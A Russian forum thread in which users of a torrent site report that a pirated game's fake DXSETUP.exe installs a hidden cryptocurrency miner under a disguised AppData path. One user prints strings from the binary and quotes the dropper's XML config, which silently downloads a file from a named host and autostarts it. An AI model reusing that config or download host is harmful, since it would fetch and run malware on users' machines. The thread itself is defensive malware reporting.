Скачал этот торрент 11/07/2017
Под спойлером немного деталей:
скрытый текст
После установки / запуска игры создалась директория
c:\Users\freen\AppData\Roaming\Java\x86-64bits Windows\Config-DefaultMain\SysUtils SDK v2.49\
с файлом svhcost.exe
Дата установки игры совпадает с датой создания этого файла с директории
О вирусе можно почитать тут
https://virusinfo.info/showthread.php?t=214714
Как только в диспетчере задач отключил автозагрузку этого файла - он удалился с диска
Но остался след в Autoruns for Windows (первая желтая строка)
maiklm писал(а):
74044370
T_ONG_BAK_J писал(а):
73999561maiklm
rom22207
Скриншоты прикрепляйте, когда делаете такие заявления. В любом случае отписал где надо. Модераторы проверят.
Скриншоты - конкретно здорово, но реально незнаю как их селать, подать и преподнести:
Ситуация следующая - после установки игры (на win 8.1 x64), с одним из вложенных кряков, отказом от директа и приблуд - вышло следующее - игра при запуске выдаёт ошибку (какую не помню - и проверить уже не смогу - удалил сразу как заподозрил проблемы), видеокарта NVIDIA GeForce GTX 1060 6GB - начала после включения компьютера запускать кулер (у неё продвинутая маза, что нет нагрузки - кулер не работает, и раньше он не запускался), я заинтересовался. Скачал GPU-Z, свежие антивиры и начал тестить. Ситуация следующая, Антивиры - ничего не нашли, НО при запуске компьютера GPU-Z выдает в Sensors - параметр GPU Load 100%. Как только открываешь диспетчер задач (что через ctrl+alt+dlt, что через пуск) - GPU Load резко падает до оптимальных 1-5%.
При всём вышесказанном - Я ЗНАЮ, что никакой другой программы в период появления столь странного глюка я не устанавливал, но вы вполне обоснованно можете заявить, что я сам виноват и к раздаче это не имеет никакого отношения.
Отсюда вопрос - КАкие скрины ЧЕГО нужно выложить?
(Винду пока не переустановил, если чтото в логах могло сохраниться - подскажите откуда вытащить)
Точно такая же проблема, GPU тоже GTX 1060 6 GB. Сначала думал просто бага винды, NZXT шный мониторинг тоже показывал 100% загрузку GPU после старта компа. Как только запускаешь диспетчер задач - сразу ноль
Антивирус Windows Defender
Antimalware Client Version: 4.12.16299.15
Engine Version: 1.1.14306.0
Antivirus Version: 1.257.436.0
Antispyware Version: 1.257.436.0
Network Realtime Inspection Engine Version: 2.1.14202.0
Network Realtime Inspection Signature Version : 118.1.0.0
UPDATE
Майнер лежит в файле DXSETUP.exe
После запуска создается файл
c:\Users\freen\AppData\Roaming\Java\x86-64bits Windows\Config-DefaultMain\SysUtils SDK v2.49\svhcost.exe и добавляется в автозагрузку.
Запустил ручками файл - вот такая красота.
Отрепортил файл вот сюда надеюсь добавят в сигнатуры свежие
https://www.microsoft.com/en-us/wdsi/filesubmission
Картинка под спойлером:
UPDATE2
Проанализировал файл DXSETUP.exe
Внутри можно увидеть такую шляпу:
M a i n F o r m F o r m 1 Ih t t p : / / b e s t . b u h s . b i z / d o w n / C o n f i g . x m l EH t t p I n s t a l l e r . P r o p e r t i e s . R e s o u r c e s § Гa0¦HІ@xS@Х Q ЂС ЂйY ЂйЂс Ђй Ђэ Ѓ<8 ЂйЂЎ Ђй Ѓ Ѓ%Ѓ)ЂйЂй
]ae8 ] Ѓ% ae8 Ђµ Ђ…Ђ‰ Ѓ5 Ѓ9 Ѓ= Ђ…
ЃIЃMЃQЂ‘Ђ•Ђ‰ Ђ‰ Ђ‰ Ђ• Ѓe Ѓi Ѓq Ѓu Ѓ} ЃЃ Ѓ- Ѓ… Ѓ‰ ЃЌЂЎ ЂЎ Ђ± ЃIЂ‰
ЂµЂ‘Ђ‘ЂµЂµ Ђ‘ Ђµ u Ѓ™ Ѓќ ЃќЂ‰ i ЂЙЂЙ ЃЎ ЃЎЂН( ЃҐЃҐ·z\V4а‰°?_Х
:Ђ $ Ђ ” $ RSA1 §Qљ$ј’VЌќCЧa¶е=єKпє+:Dw<ЖbЖµЛ’ЌPzО:А4*нКh_R3н”iС2™]и€5—БX”gелСuечWчйіЋt™$ЊЎбfОGшЊи/IчHћV\йЧ•–ЁО–$›4,кT,ZDвп¤МЅ0cS Hh t t p : / / b e s t . b u h s . b i z / d o w n / C o n f i g . x m l
И вот такую (файл делал чувак с ником One)
C:\Users\One\Desktop\ins\HttpInstaller\obj\Debug\dxwebsetup.pdb
Если перейти по этой ссылке видим xml конфиг
<config>
<mode>Silent</mode>
<projectname>TestProject</projectname>
<linktofile>
http://best.buhs.biz/down/game.zip</linktofile>;
<enablechangepath>False</enablechangepath>
<outputfolder>C:\Users\Default\AppData\Local\Temp</outputfolder>
<exefilename>1.exe</exefilename>
<enablechangecreateshortcat>False</enablechangecreateshortcat>
<createshortcat>False</createshortcat>
<shortcutname>1</shortcutname>
<autostart>True</autostart>
<autostartname>directxwebsetup.exe</autostartname>
</config>
Написал хостеру этого сайта надеюсь долго этот хост не проживет